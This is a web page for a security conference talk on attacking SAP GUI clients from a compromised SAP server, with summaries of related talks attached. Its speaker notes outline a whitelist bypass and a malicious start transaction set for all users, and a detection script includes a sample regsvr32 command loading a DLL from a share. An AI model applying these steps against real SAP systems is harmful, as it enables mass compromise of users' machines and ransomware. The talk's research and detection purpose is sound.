In this presentation, we will demonstrate how attackers can compromise all SAP clients and gain private information from their machines by using the SAP server.
What You Need to Know About Web App Security Testing in 2018
Ken DeSouza
See the associated webinar via https://www.softwaretestpro.com/what-you-need-to-know-about-web-app-security-testing-in-2018/ (there is a youtube link here)
Practical Application of the API Security Top Ten: A Tester's Perspective
RajniHatti
This document discusses API security testing from the perspective of a tester. It provides examples of API calls to Twitter and the types of tests that should be performed, such as testing for injection, broken authorization, rate limiting, and improper asset management. The document emphasizes the importance of listening, learning and looking to contribute to API security.
This document discusses various ways that geolocation capabilities in mobile apps can leak users' private location data if not implemented securely. It provides examples of common geolocation bugs like insecure network communication, insecure local storage of location data, location spoofing, over-collection of precise location coordinates, and user interface errors. The document also demonstrates how these bugs can be discovered through network sniffing, file monitoring, runtime manipulation of location data, and disassembly analysis of app code.
Synack at AppSec California 2015 - Geolocation Vulnerabilities
Synack
The document discusses geolocation features in mobile apps and potential security issues. It provides an overview of how geolocation works on iOS, code examples for implementing geolocation in Swift, and discusses common classes of geolocation bugs that could compromise a user's location privacy. These include insecure network communications, insecure local storage of location data, location spoofing, collecting overly precise location data, and user interface errors.
Web Application Penetration Testing - 101
Andrea Hauser
This document provides an overview of web application pentesting. It discusses preparations like setting up reporting and tools. The methodology involves reconnaissance, automated testing, and manual testing. Technical topics covered include the OWASP Top 10 vulnerabilities like injection, broken authentication, sensitive data exposure, and cross-site scripting. Examples are provided and recommendations on prevention. Tutorial resources like PortSwigger and OWASP Juice Shop are referenced.
This document discusses developing an automatic classification system for web-based malware using machine learning. It describes collecting malware and clean web files, extracting features from the files, analyzing the data and selecting a classifier. Key features extracted include the use of external scripts, script blocks, constant obfuscation, meta redirects, modifying the location href and using hidden attributes. The goal is to train a machine learning classifier on these features to detect malware versus clean web pages.
Introduction to Web Application Penetration Testing
Rana Khalil
Intro to web application penetration testing workshop I held in Atlanta as part of the AnitaBorg Cybersecurity Weekend on Aug. 19. The link for the event can be found here: https://community.anitab.org/event/atl-cybersecurity-day-two/
This document provides a summary of key Volatility plugins and memory analysis steps. It outlines plugins for identifying rogue processes, analyzing process DLLs and handles, reviewing network artifacts, checking for code injection evidence, looking for rootkit signs, and dumping suspicious processes/drivers. The document also provides information on memory acquisition, converting hibernation files and dumps, artifact timelining, and registry analysis plugins.
This document provides techniques for escalating privileges on Windows systems. It begins with an overview of tricks that can grant escalated privileges to users or administrators. Specific techniques discussed include exploiting misconfigurations, using keyloggers, searching for credentials on systems, exploiting Group Policy Preferences files, unattended installation files, Windows Deployment Services, binary path modifications, service configuration issues, and registry permissions problems. The document then covers methods for escalating from an administrative user to SYSTEM level privileges like using Metasploit exploits, Sysinternals tools, binary replacement, and WMIC. It concludes with sections on achieving persistence and bypassing authentication.
A follow-on to the Encyclopedia Of Windows Privilege Escalation published by InsomniaSec at Ruxcon 2011, this talk is aimed at detailing not just escalation from user to admin and admin to system, but persistence and forced authentication as well as a few other treats.
Purple Teaming With Adversary Emulation.pdf
prithaaash
Adversary emulation involves leveraging your Red Teams to use real-world adversary tactics, techniques and procedures (TTPs), alongside attack frameworks such as MITRE ATT&CK, to: identify control gaps (and weaknesses); validate your monitoring, detection and response capabilities; and prioritise your security investments towards mitigating any shortcomings observed using this approach.
These are the slides from the DEF CON talk titled 'The making of 2nd sql injection worm'. Refer to the video presentations uploaded on www.notsosecure.com.
PowerShell is often considered a threat vector by security tools like Carbon Black due to its powerful capabilities. However, the presentation argues that PowerShell is not dead and outlines ways attackers have evolved their PowerShell techniques to avoid detection. It demonstrates a C# PowerShell implant that uses reflection to bypass detection and discusses exploiting COM objects and Junction folders to migrate between processes like Internet Explorer.
Application Security from the Inside - OWASP
Sqreen
Presentation at the OWASP (Open Web Application Security Project) on how to make apps secure by protecting them from the inside.
Detecting and protecting from
1. SQL injection
2. Cross Site Scripting (XSS)
3. Third party components vulnerabilities
4. Shell injection
etc.
This document discusses using non-standard command and control (C2) channels to bypass network segmentation. It describes how VMware APIs, printers, RDP mapped drives, and LDAP attributes can be leveraged as C2 channels. Detection opportunities for each technique are also provided, such as monitoring API logs, print server event logs, module loads, and file writes. The document aims to help blue teams challenge network boundaries and red teams evade detection.
New and improved hacking oracle from web apps sumit sidharth
owaspindia
This document discusses hacking Oracle databases from web applications. It describes how SQL injection vulnerabilities in web apps connected to Oracle databases can be used to escalate privileges and execute operating system commands. Specifically, it outlines how the dbms_xmlquery.newcontext() and dbms_xmlquery.getxml() functions allow executing arbitrary PL/SQL, which can then exploit other vulnerabilities to gain DBA access privileges and run operating system code. Examples are provided that demonstrate exploiting vulnerabilities to gain DBA privileges and executing Metasploit payloads on the database server.
The document describes experiments related to system security and digital forensics.
The first experiment involves using static code analysis tools like RATS and Flawfinder to analyze code samples for vulnerabilities. The second experiment describes installing and using the vulnerability scanner Nessus to scan systems for known vulnerabilities.
The third experiment explores using the website copier HTTrack to download a website from the internet to a local directory while preserving the directory structure and links. The fourth experiment demonstrates configuring router security using passwords and access lists on Cisco Packet Tracer to filter traffic between VLANs and networks.
The bare minimum that you should know about web application security testing ...
Ken DeSouza
The document provides an overview of common tools and techniques for web application security testing. It discusses STRIDE/DREAD frameworks for threat modeling and identifying vulnerabilities. It also summarizes the OWASP Top 10 list of risks and demonstrates tools like ZAP, Wireshark, SQLMap and tcpdump for analyzing applications, networks and detecting SQL injection flaws. The document advocates threat modeling to explain security issues to various stakeholders and provides references for further reading.
1) The document provides step-by-step instructions for installing Oracle Ops Center 12c, including downloading required files, installing prerequisite packages, running the installer, and completing the initial configuration.
2) It also explains how to add new assets to be managed by Ops Center 12c, which involves creating a discovery profile to define the target systems, credentials, and IP range and initiating a discovery job to identify the targets.
3) Additional features of Ops Center 12c are highlighted such as the ability to manage targets without deploying agents and merged steps for discovering and adding assets.
Public exploit held private : Penetration Testing the researcher’s way
titanlambda
This talk is about how to solve practical challenges faced during pen-testing and exploitation. It will help you understand how this can be done efficiently and will explore various tips and tricks. It will try to answer common questions like:
0. How do I prepare? What kind of tools should I have?
1. How can I scan the entire network faster?
2. How can I get more accurate results for scanning and fingerprinting?
3. Nessus says it is vulnerable, but how can I exploit it?
4. What if I know it is vulnerable but I don’t have any exploits available?
5. I am inside the box and have compromised it; now what do I do?
In short, it will show you the pain points of a typical pen-testing exercise, how to deal with them, and will help you reach “42”, the answer to life, the universe and everything.
I got 99 trends and a # is all of them or How we found over 100 200+ RCE vulnerabilities in Trend Micro software.
Presentation released at Hack In The Box 2017 Amsterdam, by Roberto Suggi Liverani @malerisch and Steven Seeley @steventseeley.
For more information, please visit: http://blog.malerisch.net or http://srcincite.io
Positive Technologies - S4 - Scada under x-rays
qqlan
This document summarizes a presentation given by Sergey Gordeychik, Gleb Gritsai, and Denis Baranov on analyzing the security of WinCC SCADA software. It introduces the presenters and their backgrounds in industrial control system security research. They discuss common vulnerabilities found in WinCC like SQL injection, XSS, and password disclosure. The researchers provide an overview of the WinCC architecture and its various components. They analyze vulnerabilities in the WinCC project files and communication protocols. The presentation aims to bring more attention to automating security assessments of industrial control systems.
2009-08-24 The Linux Audit Subsystem Deep Dive
Shawn Wells
Presented at SHARE Denver 2009. Why is Linux auditing needed? What can it do for me? How does it work? What events get audited? How do I make sense of all the data?
The document provides an overview of web application security testing tools and techniques. It begins with an introduction to common terminology and threats. It then demonstrates various tools for tasks like vulnerability analysis (OWASP ZAP), exploitation (sqlmap), and network analysis (nmap, Wireshark, tcpdump). It also covers topics like the OWASP Top 10, STRIDE/DREAD frameworks, and threat modeling. The document emphasizes that tools should be used thoughtfully alongside security expertise and provides several references for further learning.
This document discusses logging and summarization techniques. It begins with an overview of why logging is important for application development and maintenance. It then covers different types of logs, such as system logs, application logs, and database logs. The document discusses various logging options and frameworks, with a focus on Monolog and the ELK stack. It provides examples of setting up logging with Monolog and sending logs to Elasticsearch using Logstash and viewing them in Kibana. The key aspects covered are the need for logging, different log types, popular logging frameworks and real-time log analysis using ELK.
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Anant Shrivastava
This document provides guidance on securing a web application hosted on a virtual private server (VPS). It discusses selecting secure software like Linux, Nginx, PHP and MySQL. It recommends hosting on a VPS for control over security. Key areas covered include hardening the operating system, configuring the web server, application and database securely, enabling HTTPS, securing remote access via SSH, and using a firewall and fail2ban. It also discusses securing backups, accounts with the hosting provider, and the administrator's laptop. The document aims to be comprehensive in addressing security at each layer of the web application.
Any structure expected to stand the test of time and change needs a strong foundation! Software is no exception. Engineering your code to grow in a stable and effective way is critical to your ability to rapidly meet the growing demands of users, new features, technologies, and platform capabilities. Join us to obtain architect-level design patterns for use in your Apex code to keep it well factored, easy to maintain, and in line with platform best practices. You'll follow a Force.com interpretation of Martin Fowler's Enterprise Architecture Application patterns, and the practice of Separation of Concerns.
Application and Website Security -- Fundamental Edition
Daniel Owens
The document provides an agenda for a course on application and website security. The agenda covers common input validation flaws like SQL injection and cross-site scripting, access control flaws like session hijacking, encryption flaws, security tools, and concludes with additional resources for further information. The document uses examples to demonstrate various security vulnerabilities and how they can be exploited.
Similar to SAP strikes back Your SAP server now counter attacks. (20)
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...
Crescat
Crescat is industry-trusted event management software, built by event professionals for event professionals. Founded in 2017, we have three key products tailored for the live event industry.
Crescat Event for concert promoters and event agencies. Crescat Venue for music venues, conference centers, wedding venues, concert halls and more. And Crescat Festival for festivals, conferences and complex events.
With a wide range of popular features such as event scheduling, shift management, volunteer and crew coordination, artist booking and much more, Crescat is designed for customisation and ease-of-use.
Over 125,000 events have been planned in Crescat and with hundreds of customers of all shapes and sizes, from boutique event agencies through to international concert promoters, Crescat is rigged for success. What's more, we highly value feedback from our users and we are constantly improving our software with updates, new features and improvements.
If you plan events, run a venue or produce festivals and you're looking for ways to make your life easier, then we have a solution for you. Try our software for free or schedule a no-obligation demo with one of our product specialists today at crescat.io
Need for Speed: Removing speed bumps from your Symfony projects ⚡️
Łukasz Chruściel
No one wants their application to drag like a car stuck in the slow lane! Yet it’s all too common to encounter bumpy, pothole-filled solutions that slow the speed of any application. Symfony apps are not an exception.
In this talk, I will take you for a spin around the performance racetrack. We’ll explore common pitfalls - those hidden potholes on your application that can cause unexpected slowdowns. Learn how to spot these performance bumps early, and more importantly, how to navigate around them to keep your application running at top speed.
We will focus in particular on tuning your engine at the application level, making the right adjustments to ensure that your system responds like a well-oiled, high-performance race car.
Using Query Store in Azure PostgreSQL to Understand Query Performance
Grant Fritchey
Microsoft has added an excellent new extension in PostgreSQL on their Azure Platform. This session, presented at Posette 2024, covers what Query Store is and the types of information you can get out of it.
8 Best Automated Android App Testing Tool and Framework in 2024.pdf
kalichargn70th171
Regarding mobile operating systems, two major players dominate our thoughts: Android and iPhone. With Android leading the market, software development companies are focused on delivering apps compatible with this OS. Ensuring an app's functionality across various Android devices, OS versions, and hardware specifications is critical, making Android app testing essential.
SMS API Integration in Saudi Arabia | Best SMS API Service
Yara Milbes
Discover the benefits and implementation of SMS API integration in the UAE and Middle East. This comprehensive guide covers the importance of SMS messaging APIs, the advantages of bulk SMS APIs, and real-world case studies. Learn how CEQUENS, a leader in communication solutions, can help your business enhance customer engagement and streamline operations with innovative CPaaS, reliable SMS APIs, and omnichannel solutions, including WhatsApp Business. Perfect for businesses seeking to optimize their communication strategies in the digital age.
Unveiling the Advantages of Agile Software Development.pdfbrainerhub1
Learn about Agile Software Development's advantages. Simplify your workflow to spur quicker innovation. Jump right in! We have also discussed the advantages.
Microservice Teams - How the cloud changes the way we workSven Peters
A lot of technical challenges and complexity come with building a cloud-native and distributed architecture. The way we develop backend software has fundamentally changed in the last ten years. Managing a microservices architecture demands a lot of us to ensure observability and operational resiliency. But did you also change the way you run your development teams?
Sven will talk about Atlassian’s journey from a monolith to a multi-tenanted architecture and how it affected the way the engineering teams work. You will learn how we shifted to service ownership, moved to more autonomous teams (and its challenges), and established platform and enablement teams.
SOCRadar's Aviation Industry Q1 Incident Report is out now!
The aviation industry has always been a prime target for cybercriminals due to its critical infrastructure and high stakes. In the first quarter of 2024, the sector faced an alarming surge in cybersecurity threats, revealing its vulnerabilities and the relentless sophistication of cyber attackers.
SOCRadar’s Aviation Industry, Quarterly Incident Report, provides an in-depth analysis of these threats, detected and examined through our extensive monitoring of hacker forums, Telegram channels, and dark web platforms.
GraphSummit Paris - The art of the possible with Graph TechnologyNeo4j
Sudhir Hasbe, Chief Product Officer, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
Transform Your Communication with Cloud-Based IVR SolutionsTheSMSPoint
Discover the power of Cloud-Based IVR Solutions to streamline communication processes. Embrace scalability and cost-efficiency while enhancing customer experiences with features like automated call routing and voice recognition. Accessible from anywhere, these solutions integrate seamlessly with existing systems, providing real-time analytics for continuous improvement. Revolutionize your communication strategy today with Cloud-Based IVR Solutions. Learn more at: https://thesmspoint.com/channel/cloud-telephony
What is Master Data Management by PiLog Groupaymanquadri279
PiLog Group's Master Data Record Manager (MDRM) is a sophisticated enterprise solution designed to ensure data accuracy, consistency, and governance across various business functions. MDRM integrates advanced data management technologies to cleanse, classify, and standardize master data, thereby enhancing data quality and operational efficiency.
Neo4j - Product Vision and Knowledge Graphs - GraphSummit ParisNeo4j
Dr. Jesús Barrasa, Head of Solutions Architecture for EMEA, Neo4j
Découvrez les dernières innovations de Neo4j, et notamment les dernières intégrations cloud et les améliorations produits qui font de Neo4j un choix essentiel pour les développeurs qui créent des applications avec des données interconnectées et de l’IA générative.
UI5con 2024 - Keynote: Latest News about UI5 and it’s EcosystemPeter Muessig
Learn about the latest innovations in and around OpenUI5/SAPUI5: UI5 Tooling, UI5 linter, UI5 Web Components, Web Components Integration, UI5 2.x, UI5 GenAI.
Recording:
https://www.youtube.com/live/MSdGLG2zLy8?si=INxBHTqkwHhxV5Ta&t=0
Measures in SQL (SIGMOD 2024, Santiago, Chile)Julian Hyde
SQL has attained widespread adoption, but Business Intelligence tools still use their own higher level languages based upon a multidimensional paradigm. Composable calculations are what is missing from SQL, and we propose a new kind of column, called a measure, that attaches a calculation to a table. Like regular tables, tables with measures are composable and closed when used in queries.
SQL-with-measures has the power, conciseness and reusability of multidimensional languages but retains SQL semantics. Measure invocations can be expanded in place to simple, clear SQL.
To define the evaluation semantics for measures, we introduce context-sensitive expressions (a way to evaluate multidimensional expressions that is consistent with existing SQL semantics), a concept called evaluation context, and several operations for setting and modifying the evaluation context.
A talk at SIGMOD, June 9–15, 2024, Santiago, Chile
Authors: Julian Hyde (Google) and John Fremlin (Google)
https://doi.org/10.1145/3626246.3653374
E-commerce Development Services- Hornet DynamicsHornet Dynamics
For any business hoping to succeed in the digital age, having a strong online presence is crucial. We offer Ecommerce Development Services that are customized according to your business requirements and client preferences, enabling you to create a dynamic, safe, and user-friendly online store.
DDS Security Version 1.2 was adopted in 2024. This revision strengthens support for long runnings systems adding new cryptographic algorithms, certificate revocation, and hardness against DoS attacks.
Graspan: A Big Data System for Big Code AnalysisAftab Hussain
We built a disk-based parallel graph system, Graspan, that uses a novel edge-pair centric computation model to compute dynamic transitive closures on very large program graphs.
We implement context-sensitive pointer/alias and dataflow analyses on Graspan. An evaluation of these analyses on large codebases such as Linux shows that their Graspan implementations scale to millions of lines of code and are much simpler than their original implementations.
These analyses were used to augment the existing checkers; these augmented checkers found 132 new NULL pointer bugs and 1308 unnecessary NULL tests in Linux 4.4.0-rc5, PostgreSQL 8.3.9, and Apache httpd 2.2.18.
- Accepted in ASPLOS ‘17, Xi’an, China.
- Featured in the tutorial, Systemized Program Analyses: A Big Data Perspective on Static Analysis Scalability, ASPLOS ‘17.
- Invited for presentation at SoCal PLS ‘16.
- Invited for poster presentation at PLDI SRC ‘16.
3. How to get admin privileges in SAP?
Over 500 companies have a vulnerable CTC servlet (RCE, 2011)
3 Java deserialization exploits (unauthenticated RCE, 2015)
Information disclosure + SQL injection + crypto issue + misconfiguration = RCE (Black Hat 2016)
DoS + DoS + race condition + auth bypass = RCE (Troopers 2016)
Anonymous directory traversal + privilege escalation = RCE (still waiting for a fix)
4. Minimum impact
To compromise SAP, find a vulnerability, or a chain of vulnerabilities, that lets you read
SecStore.properties and SecStore.key and obtain an administrator user with SAP_ALL privileges
Then elevate privileges and gain access to the operating system as the SAP user or root
11. SAP GUI
motivation
Goal: attack SAP users from a compromised SAP server
While executing the transaction “DBACockpit” to manage the database from SAP GUI, we noticed
that SAP GUI offers to open the database management program.
After clicking on the web browser button, SAP GUI launched the IE browser and
opened the URL without any security notification.
Interesting! Maybe we can start any program on the client’s
computer…
16. We had 4 ways
How to disable the security prompt
• Open some URL with a vulnerable/malicious ActiveX control using IE
• Analyze sapfesec.dll, which SAP GUI uses to draw the prompt
• Search for a vulnerability in the whitelist of EXE files
35. SAP JAVA GUI
• Works great on SAP GUI
• What about SAP JAVA GUI?
36. SAP JAVA GUI
Trust levels
• When a client connects to the server for the first time, a trust level for the SAP server
should be defined
37. SAP JAVA GUI
Trust levels
• Productive
• We can execute any program on a client’s computer without user interaction
• Untrusted
• We can’t execute a program on a client’s computer
• BUT it is possible to connect the user to another SAP server
39. SAP JAVA GUI
RCE
• Productive
• just execute any program via WS_EXECUTE
• Untrusted
• connect the user to a productive system
• execute any program via WS_EXECUTE
44. One type of malware: ransomware
Most popular ransomware: CryptoLocker, TorrentLocker, CryptoWall, Fusob (for mobile)
Initial ransom starts at $150 to $2,000 (Cryptomix)
Here is our agenda for today.
We’ll start with a brief review of the most common and critical vulnerabilities in SAP. These vulnerabilities give an attacker the opportunity to access and compromise critical business data.
Then we’ll watch a clip about the chain of vulnerabilities presented a year ago at Troopers 2016 and discuss what exactly an attacker can do once they find and exploit SAP vulnerabilities.
In addition, we’ll reveal our reasons for conducting this research and watch a clip about the exploitation of this vulnerability.
And we have a bonus video for you.
Now, let us analyze the vulnerabilities we’ve managed to find.
One of the most critical vulnerabilities, a remote code execution, was detected in 2011. It allows any unauthenticated user to execute an OS command via a web browser. Although the vulnerability was found 6 years ago, it was successfully used by some Asian hackers in 2016. To the present day the Internet is being scanned for this vulnerability.
It’s also worth mentioning that last year, after we had learnt about the vulnerability, we scanned the Internet as well and found that more than 500 companies had not fixed it.
To obtain critical information from SAP, attackers (or pentesters) need to find a vulnerability in SAP that reveals the contents of the secure store files, SecStore.properties and SecStore.key. The credentials of the database schema user (with its password) used to access the SAP database are stored in these files. Once I have application administrator access to SAP, I find and exploit a vulnerability in another component that gives me operating system access to the SAP server.
Now it’s time to have a look at the common SAP work scheme. Using SAP GUI, users connect to the SAP server and do their work.
Let’s consider a situation in which an attacker obtains information about SAP, exploits a vulnerability, e.g. in the SAP Gateway or SAP disp+work, and gains access to the SAP database.
In pentests we used to stop at the stage of accessing the SAP database, but today we suggest going further.
Here is a demo from the previous Troopers conference.
So, why did we decide to do this research? It’s no secret that SAP has a lot of transactions, functions and applications for managing and monitoring the system and viewing logs.
Once again, we executed the DBACockpit transaction and saw this important database management functionality.
SAP GUI asked us for a path to open the database management program. When we started it with the web browser button, SAP GUI launched the IE browser and opened the URL without any security notification. So we decided to create a special ABAP program with which we could execute any program on target computers. By the end of the research we had identified the simplest and most common way to start programs on a client’s computer: the WS_EXECUTE function module.
However, when we tried to launch the calculator with WS_EXECUTE, we got a warning message: “Do you allow SAP GUI to start calc on your computer?”
That is not what we wanted. So the next question is: how do we bypass this message?
We thought it was worth searching Google; perhaps someone had already found out how to turn the message off. Yes, someone had. We found a whole bunch of forum replies about disabling the message by changing the Windows registry. However, none of them suited us, because we simply could not change registry keys remotely. Moreover, the solution did not apply to newer SAP GUI versions.
Still, there were 4 other ways to solve the problem.
Open a special URL that uses a vulnerable ActiveX control in Internet Explorer.
Analyse how SAP GUI draws the security prompt with the help of sapfesec.dll.
Find a vulnerability in the whitelist (we’ll talk about this option a bit later).
And the 4th one… well, one doesn’t even want to consider it :D
However, at the first stage of the research the ActiveX method dropped out, so we proceeded with the 2nd one.
As mentioned before, the SAP security prompt is rendered by sapfesec.dll. Analysing this file, we learnt that if an application with one of certain names is stored in the SAP GUI directory, the security prompt does not appear. So we continued our research with this method.
Mhmm… have you noticed the “Regsvr32 – file – read, write, execute” record in the whitelist?
In other words, if this file is called from Windows, SAP GUI shows no alert and the file is executed. Regsvr32, however, is a Windows system file that is required for stable operation of the system as well as for installing and managing DLL files.
Regsvr32 is launched with predefined arguments, and the path to a DLL file is the mandatory one. A common DLL responsible for launching calc looks this way:
(It should be checked which of these functions finishes its work first.)
It turns out that a program written in ABAP that runs arbitrary code on a target system has the following form. Here smb_share is a public data store where our DLL with the malicious code is placed.
Let's consider a hypothetical situation: what would happen if an attacker found this vulnerability?
First, to get RCE on a client’s computer, it is necessary to create a user with developer rights. The user SAP* cannot create or change programs. To do this, run transaction SU01 and copy a user; for example, create a new user with SAP_ALL rights under the login EVIL_DEV.
Then log in as the EVIL_DEV user, run transaction SE38 and create a program, sap_malware_prog.
If the user with developer rights is a new one, a developer key will be needed, which is not a challenge for an attacker.
No comment
Once we are able to create a program, we click the Insert button, paste the program that implements the malicious functionality, save everything and activate the program.
The program is created; now we need to create a custom transaction that launches the malware. For example, we call the transaction MLAUNCHER.
Tie the transaction MLAUNCHER to the malicious program sap_malware_prog and save it.
However, you can go a step further and set a default (start) transaction. When a user logs in, the transaction MLAUNCHER starts and the machine runs the malicious code.
The screenshot shows that we set the start transaction MLAUNCHER for all users.
Then, whenever a user logs in to the SAP system, right after login it runs the MLAUNCHER transaction and, for example, launches a calculator.
Demo video here.
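As an added example (not code from the talk), here is one client-side check a defender can run against both scenarios above, the regsvr32 whitelist bypass and the MLAUNCHER start transaction that fires on every login: both end with SAP GUI spawning a whitelisted Windows binary that loads a DLL from a location the attacker controls. The script scans Sysmon-style process-creation records (fields ParentImage, Image, CommandLine) for regsvr32 started by the SAP GUI front end with a DLL argument on a UNC share or outside the Windows system directories. The SAP GUI process names (saplogon.exe, sapgui.exe), the trusted directories and the sample events are assumptions constructed for this example.

```python
"""Flag SAP GUI spawning regsvr32 with a DLL from an attacker-controlled path.

Added example, not code from the talk. Input records mimic Sysmon Event ID 1
(process creation) fields; the process names and sample events below are
assumptions constructed for this example.
"""
import re
from typing import Dict, List, Optional

# Assumed SAP GUI for Windows front-end binaries (not named in the talk).
SAPGUI_PARENTS = {"saplogon.exe", "sapgui.exe"}
# The talk names regsvr32 as a whitelisted binary SAP GUI starts without a prompt.
WHITELISTED_LOLBINS = {"regsvr32.exe"}
# DLLs under these directories are treated as ordinary local system files (assumption).
TRUSTED_DLL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# \\server\share\... : a DLL fetched from an SMB share, as with the talk's smb_share.
UNC_PATH = re.compile(r"^\\\\[^\\]+\\")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (either slash style)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def split_cmdline(cmd: str) -> List[str]:
    """Minimal Windows command-line splitter: whitespace separates, double quotes group."""
    tokens: List[str] = []
    current: List[str] = []
    quoted = False
    for ch in cmd:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if current:
                tokens.append("".join(current))
                current = []
        else:
            current.append(ch)
    if current:
        tokens.append("".join(current))
    return tokens


def dll_arguments(tokens: List[str]) -> List[str]:
    """Positional arguments after the program name; regsvr32 switches start with / or -."""
    return [t for t in tokens[1:] if not t.startswith(("/", "-"))]


def classify_dll_path(path: str) -> str:
    """'remote' for UNC paths, 'system' under the Windows directories, else 'local'."""
    lowered = path.lower()
    if UNC_PATH.match(lowered):
        return "remote"
    if lowered.startswith(TRUSTED_DLL_DIRS):
        return "system"
    return "local"


def analyze_event(event: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return a finding when SAP GUI starts a whitelisted binary, else None."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    if parent not in SAPGUI_PARENTS or image not in WHITELISTED_LOLBINS:
        return None
    dlls = dll_arguments(split_cmdline(event.get("CommandLine", "")))
    kinds = {classify_dll_path(d) for d in dlls}
    if "remote" in kinds:
        severity = "high"      # DLL pulled from a share: the scenario in the talk
    elif "local" in kinds:
        severity = "medium"    # DLL outside the system directories
    else:
        severity = "low"       # still unusual for SAP GUI to start regsvr32 at all
    return {"severity": severity, "parent": parent, "image": image,
            "dlls": " ".join(dlls) or "<none>"}


def scan(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run analyze_event over a batch of records and keep the findings."""
    findings = []
    for event in events:
        finding = analyze_event(event)
        if finding:
            findings.append(finding)
    return findings


# Constructed Sysmon-style records for the example; not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files (x86)\SAP\FrontEnd\SAPgui\saplogon.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s \\smb_share\payload\calc.dll"},
    {"ParentImage": r"C:\Program Files (x86)\SAP\FrontEnd\SAPgui\saplogon.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Users\alice\AppData\Local\Temp\upd.dll"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Windows\System32\msxml3.dll"},
    {"ParentImage": r"C:\Program Files (x86)\SAP\FrontEnd\SAPgui\saplogon.exe",
     "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "CommandLine": r'"C:\Program Files\Internet Explorer\iexplore.exe" http://dbcockpit.example'},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['parent']} -> {f['image']} {f['dlls']}")
```

The parent-process check is what ties the alert to the talk's attack path: regsvr32 with a UNC DLL is suspicious from any parent, but when the parent is the SAP front end it means an ABAP program on the server drove the client, which is exactly what the WS_EXECUTE whitelist bypass and the login-triggered MLAUNCHER transaction produce. Feed the scanner your own Sysmon export instead of SAMPLE_EVENTS, and extend WHITELISTED_LOLBINS with whatever else appears in the SAP GUI whitelist on your installed version.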
How can information theft from users’ computers harm, say, a company with 1000 users? Of course, by using ransomware.
Protection against ransomware is difficult. Ransomware-as-a-service attacks have been growing in popularity since the end of 2016.
1. If you are infected, infect a friend or friends and you will be unlocked
2. If you want to earn money, spread the ransomware and get paid
Ransomware is becoming more and more popular, and the number of infected user machines keeps increasing.